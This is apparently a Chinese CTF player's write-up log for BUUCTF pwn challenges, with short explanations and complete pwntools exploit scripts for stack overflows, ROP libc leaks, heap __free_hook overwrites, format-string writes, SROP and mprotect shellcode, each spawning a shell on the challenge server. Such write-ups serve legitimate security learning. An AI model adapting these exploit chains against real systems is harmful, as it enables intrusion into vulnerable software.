记录下自己在buuctf的wp

test_your_nc

连上就有flag

rip

64位,啥都没开,
程序原本是想让我们覆盖返回地址跳转到system(/bin/sh)
但是之后系统变成了Ubuntu.18,system(/bin/sh)打不过去了
所以就困难了一点,泄露libc,利用execve('bin/sh',0,0)打过去

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
from pwn import *
from LibcSearcher import LibcSearcher

context.log_level="debug"
p=process('./pwn1')
#p=remote('node3.buuoj.cn',27902)
elf=ELF('./pwn1')
pop_rdi_ret=0x004011fb
pop_rsi_r15_ret=0x04011f9
main_addr=0x0401142
__libc_start_main=elf.got['__libc_start_main']
puts_plt=elf.plt['puts']
p.recvuntil('please input\n')
#gdb.attach(p)
payload='A'*23+p64(pop_rdi_ret)+p64(__libc_start_main)+p64(puts_plt)+p64(main_addr)

p.sendline(payload)

p.recvuntil('ok,bye!!!\n')
__libc_start_addr=u64(p.recv(6).ljust(8,'\x00'))
libc=LibcSearcher('__libc_start_main',__libc_start_addr)
libcdata_addr=__libc_start_addr-libc.dump('__libc_start_main')
execve_addr=libcdata_addr+libc.dump('execve')
binsh_addr=libcdata_addr+libc.dump('str_bin_sh')
print "libcdata_addr=>",hex(libcdata_addr)
p.recvuntil('please input\n')
payload='A'*23+p64(pop_rdi_ret)+p64(binsh_addr)+p64(pop_rsi_r15_ret)+p64(0)+p64(0)+p64(execve_addr)
p.sendline(payload)

p.interactive()

warmup_csaw_2016

程序中给了system(/bin/sh),覆盖返回地址改跳转就行

1
2
3
4
5
6
7
8
from pwn import *

#p=process('./warmup_csaw_2016')
p=remote('node3.buuoj.cn',28168)
payload='A'*72+p64(0x40060d)
p.sendlineafter('>',payload)

p.interactive()

pwn1_sctf_2016

C++,程序会将输入的I变成you,造成溢出

1
2
3
4
5
6
7
8
from pwn import *

#p=process('./pwn1_sctf_2016')
p=remote('node3.buuoj.cn',26705)

p.sendline('I'*21+'a'+p32(0x8048F0D))

p.interactive()

ciscn_2019_c_1

gets()栈溢出泄露地址,然后getshell
中间吧gets()的输入加密了,直接\x00来规避strlen()监测

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
from pwn import *
from LibcSearcher import LibcSearcher

#context.log_level="debug"
#p=process('./ciscn')
p=remote('buuoj.cn',25206)
elf=ELF('./ciscn')
puts_plt=elf.plt['puts']
__libc_start_main=elf.got['__libc_start_main']

main_addr=0x00400B28
pop_rdi_ret=0x00400c83
pop_rsi_r15_ret=0x0400c81


p.recvuntil('Input your choice!\n')
p.sendline('1')
payload='\x00'+'A'*0x4f+p64(0)+p64(pop_rdi_ret)+p64(__libc_start_main)+p64(puts_plt)+p64(main_addr)
p.recvuntil('Input your Plaintext to be encrypted\n')
p.sendline(payload)

p.recvline()
p.recvline()

__libc_start_addr=u64(p.recv(6).ljust(8,'\x00'))
libc=LibcSearcher('__libc_start_main',__libc_start_addr)
libcbase_addr=__libc_start_addr-libc.dump('__libc_start_main')
execve_addr=libcbase_addr+libc.dump('execve')
binsh_addr=libcbase_addr+libc.dump('str_bin_sh')
print "libcbase_addr=>",hex(libcbase_addr)
p.recvuntil('Input your choice!\n')
p.sendline('1')
payload='\x00'+'A'*0x4f+p64(0)+p64(pop_rdi_ret)+p64(binsh_addr)+p64(pop_rsi_r15_ret)+p64(0)+p64(0)+p64(execve_addr)+p64(main_addr)
p.recvuntil('Input your Plaintext to be encrypted\n')
p.sendline(payload)
p.interactive()

ciscn_2019_n_1

覆盖个浮点数
想无赖点写个C语言看看栈

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
from pwn import *
context.log_level = 'debug'
context.arch = 'amd64'
elf = ELF('n_ciscn')
sh = 0
lib = 0
def pwn(ip,port,debug):
global sh
global lib
if(debug == 1):
p = process('./n_ciscn')

else:
p = remote(ip,port)
p.recvuntil("Let's guess the number.\n")
gdb.attach(p)
p.sendline('A'*(0x30-4)+p32(0x41348000))

p.interactive()
if __name__ == '__main__':
pwn('buuoj.cn',20035,1)

[OGeek2019]babyrop

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
from pwn import *
from LibcSearcher import LibcSearcher

p=process('./pwn')

elf=ELF('./pwn')
puts_plt=elf.plt['puts']
__libc_start_main=elf.got['__libc_start_main']

p.sendline('\x00'*7+'\xff')
main_addr=0x08048825

p.recvuntil('Correct\n')
payload='A'*0xE7+p32(0)+p32(puts_plt)+p32(main_addr)+p32(__libc_start_main)
p.sendline(payload)
__libc_start_addr=u32(p.recv(4))
print "__libc_start_addr=>",hex(__libc_start_addr)
libc=LibcSearcher("__libc_start_main",__libc_start_addr)
libcdata_addr=__libc_start_addr-libc.dump('__libc_start_main')
system_addr=libcdata_addr+libc.dump('system')
binsh_addr=libcdata_addr+libc.dump('str_bin_sh')
p.sendline('\x00'*7+'\xff')
p.recvuntil('Correct\n')
payload='A'*0xE7+p32(0)+p32(system_addr)+p32(main_addr)+p32(binsh_addr)
p.sendline(payload)
p.interactive()

babyheap_0ctf_2017

单字节溢出

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
from pwn import *
from LibcSearcher import LibcSearcher
p=process('./babyheap')
#p=remote('node3.buuoj.cn',25895)
context.log_level="debug"
def Allocate(Size):
p.sendlineafter('Command: ','1')
p.sendlineafter('Size: ',str(Size))
def Fill(Index,Size,context):
p.sendlineafter('Command: ','2')
p.sendlineafter('Index: ',str(Index))
p.sendlineafter('Size: ',str(Size))
p.sendafter('Content: ',context)
def Free(Index):
p.sendlineafter('Command: ','3')
p.sendlineafter('Index: ',str(Index))
def Dump(Index):
p.sendlineafter('Command: ','4')
p.sendlineafter('Index: ',str(Index))
Allocate(0x10)#
Allocate(0x10)
Allocate(0x10)
Allocate(0x10)
Allocate(0x80)
Allocate(0x10)
Allocate(0x68)
Free(2)
Free(1)

payload=p64(0)*3+p64(0x21)+'\x80'
Fill(0,len(payload),payload)

payload=p64(0)*3+p64(0x21)
Fill(3,len(payload),payload)

Allocate(0x10)#1
Allocate(0x10)#2

payload= p64(0)*3+p64(0x91)
Fill(3,len(payload),payload)
Allocate(0x80)
Free(4)
Dump(2)
p.recvline()
libc_start_main=u64(p.recv(6).ljust(8,'\x00'))-(0x7f409c186b78-0x7f409bde2740)
print 'libc_start_main=>',hex(libc_start_main)
libc=LibcSearcher('__libc_start_main',libc_start_main)
libcbase_addr=libc_start_main-libc.dump('__libc_start_main')
print 'libcbase_addr=>',hex(libcbase_addr)
free_hook_addr=libcbase_addr+libc.dump('__free_hook')
system_addr=libcbase_addr+libc.dump('system')
print "free_hook_addr=>",hex(free_hook_addr)
payload= p64(0)*3+p64(0x91)+p64(0)+p64(free_hook_addr-0x40)
Fill(3,len(payload),payload)
Allocate(0x80)
Free(6)
payload=p64(0)*3+p64(0x71)+p64(free_hook_addr-0x33)
Fill(5,len(payload),payload)
Allocate(0x68)#6
Allocate(0x68)#8
payload='\x00'*35+p64(system_addr)
Fill(8,len(payload),payload)
Fill(7,8,'/bin/sh\x00')
Free(7)

#gdb.attach(p)

p.interactive()

get_started_3dsctf_2016

静态编译,以为是个简单的,其实要用mprotect来更改权限

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
from pwn import *

context.arch = "i386"
#context.log_level='debug'
p=remote('node3.buuoj.cn',27708)
#p=process('./get_sta')
elf=ELF('get_sta')
#mprotect_plt=elf.plt['mprotect']
#read_plt=elf.plt['read']
pop_3_ret=0x0804f460
#gdb.attach(p)
payload='A'*56+p32(0x806EC80)+p32(pop_3_ret)+p32(0x080EB000)+p32(0x1000)+p32(7)+p32(0x806E14A)+p32(0x080EB000)+p32(1)+p32(0x080EB000)+p32(0x100)

p.sendline(payload)
sleep(1)
p.sendline(asm(shellcraft.sh()))
p.interactive()

[第五空间2019 决赛]PWN5

格式化字符串改个值

1
2
3
4
5
6
7
8
9
10
11
from pwn import *

#p=remote('node3.buuoj.cn',28966)
p=process('./pwn')
payload='%14$hn%15$hn'.ljust(16,'A')+p32(0x804C044)+p32(0x804C046)
#gdb.attach(p)
p.sendlineafter('your name:',payload)
payload=p32(0x00040004)+p32(0)
p.sendlineafter('your passwd:',payload)

p.interactive()

not_the_same_3dsctf_2016

写32位shellcode

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15

from pwn import*

context.arch = "i386"
#p=remote('node3.buuoj.cn',26098)
p=process('./not_3dsctf_2016')
#gdb.attach(p)
pop3_ret=0x0804f420
mprotect=0x806ED40
payload = 'a'*45+p32(mprotect)+p32(pop3_ret)+p32(0x80EB000)+p32(0x1000)+p32(7)+p32(0x806E200)+p32(0x80EB000)+p32(0)+p32(0x80EB000)+p32(0x100)

p.sendline(payload)

p.sendline(asm(shellcraft.sh()))
p.interactive()

ciscn_2019_n_8

动调下吧

1
2
3
4
5
6
7
8
9
from pwn import *

#p=process('./ciscn')
p=remote('node3.buuoj.cn',25006)
#gdb.attach(p)
p.recvuntil("What's your name?\n")
payload='A'*0x34+p32(0x11)+p32(0)+"C"
p.sendline(payload)
p.interactive()

babyfengshui_33c3_2016

32位堆 ,改写free->system

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
from pwn import *
from LibcSearcher import LibcSearcher

#context.log_level="debug"
p=process('./babyfengshui')
#p=remote('node3.buuoj.cn',29500)
elf=ELF('./babyfengshui')
free_got=elf.got['free']
def Allocate(descrip,name,length,text):
p.sendlineafter('Action: ','0')
p.sendlineafter('size of description: ',str(descrip))
p.sendlineafter('name: ',name)
p.sendlineafter('text length: ',str(length))
p.recvuntil('text: ')
p.sendline(text)
def Update(Index,length,text):
p.sendlineafter('Action: ','3')
p.sendlineafter('index: ',str(Index))
p.sendlineafter('text length: ',str(length))
p.sendafter('text: ',text)
def Free(Index):
p.sendlineafter('Action: ','1')
p.sendlineafter('index: ',str(Index))
def Dump(Index):
p.sendlineafter('Action: ','2')
p.sendlineafter('index: ',str(Index))

Allocate(0x80,'\xee'*4,0x80,'\xee'*4)
Allocate(0x10,'\x11'*4,0x10,'\x22'*4)
Allocate(0x80,'\x11'*4,0x80,'\x22'*4)
Allocate(0x10,'/bin/sh\x00',0x10,'/bin/sh\x00')
Free(0)
payload='\x11'*0x108+p32(0)+p32(0x19)+'j'*8+p64(0)+p32(0)+p32(0x89)+p32(free_got)
Allocate(0x100,'\x00',0x200,payload)
Dump(1)
p.recvuntil('description: ')
free_addr=u32(p.recv(4))
print "free_addr=>",hex(free_addr)
libc=LibcSearcher('free',free_addr)
libcdata_addr=free_addr-libc.dump('free')
print "libcdata_addr=>",hex(libcdata_addr)
system_addr=libcdata_addr+libc.dump('system')
print "system_addr=>",hex(system_addr)
Update(1,0x4,p32(system_addr))

Free(3)

p.interactive()

ciscn_2019_s_3

SROP

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
from pwn import *

#p=process('./ciscn')
p=remote('node3.buuoj.cn',27381)
context.arch = "amd64"
elf = ELF("ciscn")
main_addr=0x40051D

mov_eax_0xf_ret=0x4004DA
syscall_ret=0x400517
read_write_ret = 0x4004F1
payload='/bin/sh\x00'.ljust(16,'A')+p64(read_write_ret)


p.sendline(payload)
p.recvuntil('AAAAAAAA')
stack_addr=u64(p.recv()[16:22].ljust(8,'\x00'))
print "stack_addr=>",hex(stack_addr)

binsh = stack_addr - 0x118
sigframe = SigreturnFrame()
sigframe.rax = constants.SYS_execve
sigframe.rdi = binsh
#sigframe.rsp = stack_addr
sigframe.rip = syscall_ret
sigframe.rsi = 0
sigframe.rdx = 0
#gdb.attach(p)

payload='a'*16+p64(mov_eax_0xf_ret)+p64(syscall_ret)+str(sigframe)
p.send(payload)
p.interactive()

[HarekazeCTF2019]baby_rop

1
2
3
4
5
6
7
8
9
10
11
12
13
from pwn import *

p=process('./babyrop')
#p=remote('node3.buuoj.cn',25812)
elf=ELF('./babyrop')

p.recvuntil("What's your name? ")
main_addr=0x4005D6
payload='A'*16+p64(0)+p64(0x400683)+p64(0x601048)+p64(0x4005e3)
#gdb.attach(p)
p.sendline(payload)
#print p.recv()
p.interactive()

ciscn_2019_final_3

从tcachebins逃出去,才能泄露,
tcachebins最大为0x500,合并堆块让tcachebins大于0x500 、
然后改写__free_hook_

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
from pwn import *

p=process('./ciscn_final_3')
#p=remote('node3.buuoj.cn',29871)
#context.log_level="debug"
elf=ELF('./ciscn_final_3')
free_got=elf.got['free']
print "free_got=>",hex(free_got)
libc=ELF('/lib/x86_64-linux-gnu/libc.so.6')
def add(Index,length,size):
p.sendlineafter('choice > ','1')
p.sendlineafter('input the index\n',str(Index))
p.sendlineafter('input the size\n',str(length))
p.sendafter('now you can write something\n',size)
def free(Index):
p.sendlineafter('choice > ','2')
p.sendlineafter('input the index\n',str(Index))
add(0,0x78,'\x00'*0x78)

add(1,0x78,p64(0x78))
p.recvuntil('gift :0x')
addr=int(p.recv(12),16)
add(2,0x78,'b'*0x78)
add(3,0x78,'x')
add(4,0x78,'\x33' * 0x78)
add(5,0x78,'\x44' * 0x78)
add(6,0x78,'\x55' * 0x78)
add(7,0x78,'\x66' * 0x78)
add(8,0x78,'\x77' * 0x78)
add(9,0x78,'/bin/sh\x00')
add(10,0x78,'aa')
add(11,0x78,'aa')
free(0)
free(0)

print "addr",hex(addr)
add(12,0x78,p64(addr-0x10))
add(13,0x78,p64(addr-0x10))
add(14,0x78,p64(0)+p64(0x481))
p.recvuntil('gift :0x')
addr2=int(p.recv(12),16)
print "addr2=>",hex(addr2)
free(1)
add(15,0x68,'aa')
free(15)
free(15)
gdb.attach(p)
add(16,0x68,p64(addr2+0x80))
add(17,0x68,p64(addr2+0x80))
add(18,0x68,'\x00')
add(19,0x68,'\x00')
p.recvuntil('gift :0x')
addr3=int(p.recv(12),16)
libcdata_addr=addr3-0x3EBCA0
system_addr=libcdata_addr+libc.symbols['system']
__free_hook=libcdata_addr+libc.symbols['__free_hook']
print "__free_hook=>",hex(__free_hook)
print "libcdata_addr=>",hex(libcdata_addr)
print "addr3=>",hex(addr3)
add(20,0x38,p64(0xdeadbeef))
free(20)
free(20)
add(21,0x38,p64(__free_hook))
add(22,0x38,p64(__free_hook))
add(23,0x38,p64(system_addr))
free(9)

gdb.attach(p)

p.interactive()

pwn2_sctf_2016

典型泄露地址然后getshell

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
from pwn import *
from LibcSearcher import LibcSearcher

p=process('./pwn_2_sctf_2016')
#p=remote('buuoj.cn',29982)
elf=ELF('./pwn_2_sctf_2016')
printf_got=elf.got['printf']
printf_plt=elf.plt['printf']
p.sendlineafter('read? ','-12')
#gdb.attach(p)
p.recvuntil('bytes of data!\n')
main_addr=0x08048535
V5_0=0x080483D0
payload='A'*0x2C+'A'*4+p32(printf_plt)+p32(V5_0)+p32(0x80486F8)+p32(printf_got)
p.sendline(payload)
p.recvuntil('said: ')
p.recvuntil('said: ')
printf_addr=u32(p.recv(4))
print "printf_addr=>",hex(printf_addr)
libc=LibcSearcher('printf',printf_addr)
libcdata_addr=printf_addr-libc.dump('printf')
system_addr=libcdata_addr+libc.dump('system')
bin_sh_addr=libcdata_addr+libc.dump('str_bin_sh')
p.sendlineafter('read? ','-12')
p.recvuntil('bytes of data!\n')
payload='A'*0x2C+'A'*4+p32(system_addr)+p32(V5_0)+p32(bin_sh_addr)
p.sendline(payload)
p.interactive()

ez_pz_hackover_2016

写个shellcode就行,

1
2
3
4
5
6
7
8
9
10
11
12
13
14
from pwn import *

#p=process('./ez_pz_hackover')
p=remote('node3.buuoj.cn',25160)
p.recvuntil('0x')
stack_addr=int(p.recv(8),16)+8-0x24
print "stack_addr=>",hex(stack_addr)
p.recvuntil('> ')
#gdb.attach(p)
shellcode=asm(shellcraft.sh())
print len(shellcode)
payload='crashme\x00'+'AAAAAAAAAA'+'A'*8+p32(stack_addr)+shellcode
p.sendline(payload)
p.interactive()

ciscn_2019_n_5

还是说system(‘/bin/sh’)打不过去,还是用execve(‘/bin/sh’,0,0)

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
from pwn import *
#from LibcSearcher import LibcSearcher

#p=remote('node3.buuoj.cn',28049)
p=process('./ciscn')
elf=ELF('./ciscn')
context.arch = "amd64"
libc=ELF('libc.so.6')
pop_rdi_ret=0x0400713
pop_rsi_r15_ret=0x400711
main_addr=0x0400636
bss_addr=0x00601080
puts_plt=elf.plt['puts']
__libc_start_main=elf.got['__libc_start_main']
p.recvuntil('tell me your name\n')

p.sendline('a')
p.recvuntil('say to me?\n')
payload='A'*40+p64(pop_rdi_ret)+p64(__libc_start_main)+p64(puts_plt)+p64(main_addr)
p.sendline(payload)

__libc_startaddr=u64(p.recv(6).ljust(8,'\x00'))
#libc=LibcSearcher('__libc_start_main',__libc_startaddr)
libcdata_addr=__libc_startaddr-libc.symbols['__libc_start_main']
print "libcdata_addr=>",hex(libcdata_addr)
system_addr=libcdata_addr+libc.symbols['system']
exeace_addr=libcdata_addr+libc.symbols['execve']
binsh = libcdata_addr +libc.search("/bin/sh\x00").next()
print "system_addr=>",hex(system_addr)
p.recvuntil('tell me your name\n')
#gdb.attach(p)
p.sendline('/bin/sh\x00')
p.recvuntil('say to me?\n')
#payload='a'*40+p64(pop_rdi_ret)+p64(binsh)+p64(system_addr)
payload='B'*40+p64(pop_rdi_ret)+p64(binsh)+p64(pop_rsi_r15_ret)+p64(0)+p64(0)+p64(exeace_addr)
p.sendline(payload)
p.interactive()

ciscn_2019_ne_5

跟上面思路差不多

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
from pwn import *
from LibcSearcher import LibcSearcher

p=remote('node3.buuoj.cn',29316)
#p=process('./ciscn')
elf=ELF('./ciscn')
__libc_start_main=elf.got['__libc_start_main']
system_addr=elf.plt['system']
main_addr=0x8048722
pop2_ret=0x0804871f
p.sendlineafter('password:','administrator')
p.sendlineafter(':','1')

payload='A'*76+p32(0x08048490)+p32(main_addr)+p32(0x80489F5)+p32(__libc_start_main)

p.sendlineafter('info:',payload)
p.sendlineafter(':','4')
p.recvuntil('The flag is your log:')
p.recvuntil('The flag is your log:')
__libc_start_addr=u32(p.recv(4))
libc=LibcSearcher('__libc_start_main',__libc_start_addr)
libcdata_addr=__libc_start_addr-libc.dump('__libc_start_main')
print "libcdata_addr=>",hex(libcdata_addr)

binsh_addr=libcdata_addr+libc.dump('str_bin_sh')
print "binsh_addr=>",hex(binsh_addr)
p.sendlineafter('password:','administrator')
p.sendlineafter(':','1')
payload='A'*76+p32(system_addr)+p32(main_addr)+p32(binsh_addr)+p32(__libc_start_main)
p.sendlineafter('info:',payload)
p.sendlineafter(':','4')
p.interactive()

[HarekazeCTF2019]baby_rop2

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
from pwn import *

p=process('./babyrop2')
elf=ELF('./babyrop2')
libc=ELF('/lib/x86_64-linux-gnu/libc.so.6')
printf_got=elf.plt['printf']
__libc_start_main=elf.got['__libc_start_main']
pop_rdi_ret=0x0400733
pop_rsi_p15_ret=0x400731
main_addr=0x0400540
gdb.attach(p)
payload='A'*40+p64(pop_rdi_ret)+p64(0x400770)+p64(pop_rsi_p15_ret)+p64(__libc_start_main)+p64(0)+p64(printf_got)+p64(main_addr)+p64(0)
p.sendlineafter('name? ',payload)
p.recvuntil('again, ')
p.recvuntil('again, ')
__libc_start_addr=u64(p.recv(6).ljust(8,'\x00'))
print "__libc_start_addr=>",hex(__libc_start_addr)
libcdata_addr=__libc_start_addr-libc.symbols['__libc_start_main']
system_addr=libcdata_addr+libc.symbols['system']

binsh_addr=libcdata_addr+libc.search("/bin/sh\x00").next()
print "libcdata_addr=>",hex(libcdata_addr)
print "system_addr=>",hex(system_addr)
print "binsh_addr=>",hex(binsh_addr)
payload='A'*40+p64(pop_rdi_ret)+p64(binsh_addr)+p64(system_addr)
p.sendlineafter('name? ',payload)

p.interactive()

ciscn_2019_es_2

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
from pwn import *

p=remote('node3.buuoj.cn',25311)
#p=process('./ciscn')
elf=ELF('./ciscn')
system_addr=elf.plt['system']
p.recvuntil("name?")

leave_ret=0x080484b8
payload='A'*0x27
p.sendline(payload)
p.recvline()
p.recvline()
stack_addr=u32(p.recv(4))-0x38
print "stack_addr=>",hex(stack_addr)
p.recvline()
payload2=p32(stack_addr+30)+p32(system_addr)+p32(0)+p32(stack_addr+0x10)+'/bin/sh\x00'+'B'*0x10+p32(stack_addr)+p32(leave_ret)
p.sendline(payload2)
p.interactive()

roarctf_2019_easy_pwn

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
from pwn import *
from LibcSearcher import LibcSearcher

#context.log_level="debug"
p=process('./roar')
#p=remote('node3.buuoj.cn',27009)
def add(size):
p.sendlineafter('choice: ','1')
p.sendlineafter('size: ',str(size))
p.recvuntil('ticket is ')
return p.recv(1)
def Write(index,size,content):
p.sendlineafter('choice: ','2')
p.sendlineafter('index: ',str(index))
p.sendlineafter('size: ',str(size))
p.sendafter('content: ',content)
def free(index):
p.sendlineafter('choice: ','3')
p.sendlineafter('index: ',str(index))
def show(index):
p.sendlineafter('choice: ','4')
p.sendlineafter('index: ',str(index))
add(0x18)
add(0x18)
add(0x88)
add(0x18)
a3=add(0x18)
Write(a3,8,'/bin/sh\x00')
add(0x18)#5
add(0x48)
aaa=add(0x68)
add(0x18)
Write(5,0x18+10,p64(0)*3+'\xc1')
free(6)
free(aaa)
gan=add(0xb0)


free(3)
payload=p64(0)*3+'\xb1'
Write(0,0x18+10,payload)
free(1)

a1=add(0x98)
payload=p64(0)*3+p64(0x91)
Write(1,len(payload),payload)
free(2)
show(a1)
p.recvuntil('content: ')
p.recv(40)
main_arena_addr=u64(p.recv(8))-88-3818464
print "__libc_start_main=>",hex(main_arena_addr)
libc=LibcSearcher('__libc_start_main',main_arena_addr)
libcbase_addr=main_arena_addr-libc.dump('__libc_start_main')
system_addr=libcbase_addr+libc.dump('system')
free_got_addr=libcbase_addr+libc.dump('__free_hook')
binsh_addr=libcbase_addr+libc.dump('str_bin_sh')
payload=p64(0)*9+p64(0x71)+p64(free_got_addr-0x33)
Write(gan,len(payload),payload)
add(0x68)

payload=p64(0)*3+p64(0x91)+p64(main_arena_addr+88+3818464)+p64(free_got_addr-0x40)
Write(a1,len(payload),payload)
add(0x88)
add(0x18)
pwnnn=add(0x68)
payload=p64(0)*4+'\x00'*3+p64(system_addr)
Write(pwnnn,len(payload),payload)

free(a3)
#gdb.attach(p)

p.interactive()